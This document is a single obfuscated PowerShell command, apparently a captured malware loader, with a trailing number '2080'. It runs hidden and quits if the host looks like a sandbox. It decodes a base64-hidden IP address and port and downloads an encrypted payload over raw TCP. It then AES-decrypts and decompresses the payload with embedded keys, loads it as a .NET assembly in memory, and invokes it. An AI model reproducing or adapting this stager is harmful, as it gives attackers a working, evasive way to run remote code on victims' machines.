powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command if ([System.Environment]::GetEnvironmentVariables().Count -lt 10) {exit -65536;} $chigoesTimist = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('OTEuMjE1Ljg1LjE5OA==')); $alfaquiJundies = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('MzU5NjQ=')); $slawsMetrize = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ODNjNjk=')); $outgoOctads = new-object System.Net.Sockets.TcpClient; $outgoOctads.Connect($chigoesTimist, [int]$alfaquiJundies); $slawsOutgo = $outgoOctads.GetStream(); $outgoOctads.SendTimeout = 300000; $outgoOctads.ReceiveTimeout = 300000; $slawsExclaim = [System.Text.StringBuilder]::new(); $slawsExclaim.AppendLine('GET /' + $slawsMetrize); $slawsExclaim.AppendLine('Host: ' + $chigoesTimist); $slawsExclaim.AppendLine(); $slawsVoguish = [System.Text.Encoding]::ASCII.GetBytes($slawsExclaim.ToString()); $slawsOutgo.Write($slawsVoguish, 0, $slawsVoguish.Length); $octadsExclaim = New-Object System.IO.MemoryStream; $slawsOutgo.CopyTo($octadsExclaim); $slawsOutgo.Dispose(); $outgoOctads.Dispose(); $octadsExclaim.Position = 0; $exclaimOctads = $octadsExclaim.ToArray(); $octadsExclaim.Dispose(); $jundiesExclaim = [System.Text.Encoding]::ASCII.GetString($exclaimOctads).IndexOf('`r`n`r`n')+1; $voguishJundies = [System.Text.Encoding]::ASCII.GetString($exclaimOctads[$jundiesExclaim..($exclaimOctads.Length-1)]); $voguishJundies = [System.Convert]::FromBase64String($voguishJundies); $alfaquiSlaws = New-Object System.Security.Cryptography.AesManaged; $alfaquiSlaws.Mode = [System.Security.Cryptography.CipherMode]::CBC; $alfaquiSlaws.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $alfaquiSlaws.Key = [System.Convert]::FromBase64String('HFk5TkL1SWFKf0ttQovZt1j+09jfjjOj6rSlVOK1CGU='); $alfaquiSlaws.IV = [System.Convert]::FromBase64String('34A3btGY/kf2JLl8KGEavg=='); $alfaquiVoguish = $alfaquiSlaws.CreateDecryptor(); $voguishJundies = $alfaquiVoguish.TransformFinalBlock($voguishJundies, 0, $voguishJundies.Length); $alfaquiVoguish.Dispose(); $alfaquiSlaws.Dispose(); $metrizeChigoes = New-Object System.IO.MemoryStream(, $voguishJundies); $alfaquiOctads = New-Object System.IO.MemoryStream; $voguishOutgo = New-Object System.IO.Compression.GZipStream($metrizeChigoes, [IO.Compression.CompressionMode]::Decompress); $voguishOutgo.CopyTo($alfaquiOctads); $voguishJundies = $alfaquiOctads.ToArray(); $metrizeSlaws = [System.Reflection.Assembly]::Load($voguishJundies); $timistVoguish = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('b290aGVjYUZsYXdmdWw=')); $outgoTimist = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('b2N0YWRzVGltaXN0')); $octadsAlfaqui = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('bWV0cml6ZUV4Y2xhaW0=')); $chigoesOctads = $metrizeSlaws.GetType($timistVoguish + '.' + $outgoTimist); $voguishAlfaqui = $chigoesOctads.GetMethod($octadsAlfaqui); $voguishAlfaqui.Invoke($jundiesSlaws, (, [string[]] (''))); #($jundiesSlaws, $jundiesSlaws);
2080